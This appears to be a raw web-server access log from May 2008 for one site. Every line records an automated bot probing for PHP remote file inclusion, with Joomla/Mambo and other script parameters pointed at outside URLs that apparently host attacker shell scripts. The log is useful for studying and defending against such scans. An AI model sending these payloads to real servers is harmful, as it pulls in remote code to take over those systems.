85.17.138.13 - - [04/May/2008:10:22:36 -0700] "GET /logs//include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:22:36 -0700] "GET //include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:10:23:03 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:10:23:03 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.70.204.99 - - [04/May/2008:10:23:06 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:23:15 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:23:17 -0700] "GET /logs/index.php?Load=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:23:23 -0700] "GET /index.php?Load=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:10:23:24 -0700] "GET /logs/access_080211.log//account.php?action=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:10:23:27 -0700] "GET /logs/access.log//atom.php5?page=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:10:23:29 -0700] "GET /logs//account.php?action=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:10:23:50 -0700] "GET /logs/access_071230.log//account.php?action=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.3.68 - - [04/May/2008:10:24:15 -0700] "GET /logs/home.php?pag=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:10:24:17 -0700] "GET //common/db.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:10:24:20 -0700] "GET //common/db.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:24:22 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:24:36 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:24:36 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.79.202 - - [04/May/2008:10:25:24 -0700] "GET /logs/access_071212.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?http://www.handowire.com/board/mic22_mod.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.233.79.202 - - [04/May/2008:10:25:24 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?http://www.handowire.com/board/mic22_mod.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.233.79.202 - - [04/May/2008:10:25:25 -0700] "GET /logs/access_080324.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?http://www.handowire.com/board/mic22_mod.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:25:40 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:25:50 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:25:50 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [04/May/2008:10:25:54 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:26:03 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:26:04 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:26:23 -0700] "GET //toplist.php?f=toplist_top10&phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.80.93.168 - - [04/May/2008:10:26:27 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.fmweb.it/images/2.png?? HTTP/1.1" 200 11606 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:10:26:39 -0700] "GET /logs/access_080315.log//metabase/metabase_interface.php?commonpath=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:10:26:40 -0700] "GET //metabase/metabase_interface.php?commonpath=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:10:26:41 -0700] "GET /logs//metabase/metabase_interface.php?commonpath=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:26:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:26:51 -0700] "GET //skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [04/May/2008:10:27:04 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:05 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:05 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:06 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:06 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:14 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:14 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:15 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:15 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:35 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:35 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:36 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:36 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:42 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:43 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:43 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:27:44 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:28:28 -0700] "GET /logs/index.php?screen=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:28:34 -0700] "GET /index.php?screen=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:28:51 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:28:51 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:28:52 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:30:36 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:30:38 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:30:42 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:30:51 -0700] "GET /logs/mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:30:52 -0700] "GET /mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:30:52 -0700] "GET /logs/mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:30:53 -0700] "GET /mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:31:57 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:32:23 -0700] "GET /logs/index2.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:32:24 -0700] "GET /index2.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:32:32 -0700] "GET /logs/index2.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:32:33 -0700] "GET /index2.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:32:53 -0700] "GET /logs/access_080308.log/mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:32:54 -0700] "GET /mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:32:54 -0700] "GET /logs/mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:33:08 -0700] "GET /logs/access_080308.log/mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:33:08 -0700] "GET /mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:33:08 -0700] "GET /logs/mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:10:33:27 -0700] "GET /index.php?Load=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:34:18 -0700] "GET /logs/access_080210.log//toplist.php?f=toplist_top10&phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:34:19 -0700] "GET //toplist.php?f=toplist_top10&phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:34:19 -0700] "GET /logs//toplist.php?f=toplist_top10&phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.101.26.99 - - [04/May/2008:10:34:44 -0700] "GET //include.php?path[docroot]=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.103.159.159 - - [04/May/2008:10:34:52 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:35:08 -0700] "GET /logs/access_080219.log/mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:10:35:19 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:10:35:24 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:10:35:24 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:35:25 -0700] "GET /logs/access_080219.log/mcf.php?content=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
24.214.175.252 - - [04/May/2008:10:35:42 -0700] "GET /logs/atom.php5?page=http://www.imperialfutar.hu/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.214.175.252 - - [04/May/2008:10:35:42 -0700] "GET /atom.php5?page=http://www.imperialfutar.hu/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:10:35:47 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:10:35:47 -0700] "GET /logs//common/db.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:10:36:01 -0700] "GET /logs/index.php?screen=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:10:36:06 -0700] "GET /index.php?screen=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:36:24 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:36:56 -0700] "GET /logs/index2.php?x=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:36:57 -0700] "GET /index2.php?x=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:36:58 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:36:58 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:37:00 -0700] "GET /logs/index.php?pag=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:37:01 -0700] "GET /logs/access_080311.log/db.php?path_local=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:37:01 -0700] "GET /db.php?path_local=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:37:01 -0700] "GET /logs/db.php?path_local=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:37:05 -0700] "GET /index.php?pag=http://www.snd.fr/upload/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.173.42 - - [04/May/2008:10:37:35 -0700] "GET /logs/index.php?go=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:37:38 -0700] "GET /logs/access_080312.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.173.42 - - [04/May/2008:10:37:40 -0700] "GET /logs/index.php?go=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [04/May/2008:10:37:40 -0700] "GET /index.php?go=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:37:46 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:37:47 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [04/May/2008:10:37:48 -0700] "GET /index.php?go=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:37:54 -0700] "GET /logs/access_080225.log/db.php?path_local=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:38:25 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [04/May/2008:10:38:32 -0700] "GET /logs/access_080221.log//display.php?page=http://www.cgd-k25.org/forum//includes/error/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:38:42 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:38:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.22.150.131 - - [04/May/2008:10:38:44 -0700] "GET /logs/access_080219.log/mcf.php?content=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:39:09 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.197.231.29 - - [04/May/2008:10:39:11 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.197.231.29 - - [04/May/2008:10:39:11 -0700] "GET /logs//include.php?path[docroot]=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:39:14 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:39:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:39:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:39:19 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:10:39:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:10:39:25 -0700] "GET //skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:39:36 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.197.231.29 - - [04/May/2008:10:39:47 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:40:12 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:10:40:13 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
